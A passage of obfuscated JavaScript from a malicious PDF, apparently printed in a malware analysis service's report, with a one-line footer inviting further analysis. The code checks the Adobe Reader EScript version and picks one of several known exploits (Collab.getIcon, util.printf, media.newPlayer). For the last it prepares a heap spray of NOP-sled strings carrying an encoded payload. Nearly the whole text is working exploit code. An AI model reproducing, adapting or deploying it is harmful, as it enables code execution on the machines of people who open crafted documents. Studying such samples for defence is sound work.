tUMhNbGw='N.'+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}} if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}} if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}a();a();try{this.media.newPlayer(null);}catch(e){}a();}}

Open this report in the interactive analyzer, or submit your own file for analysis.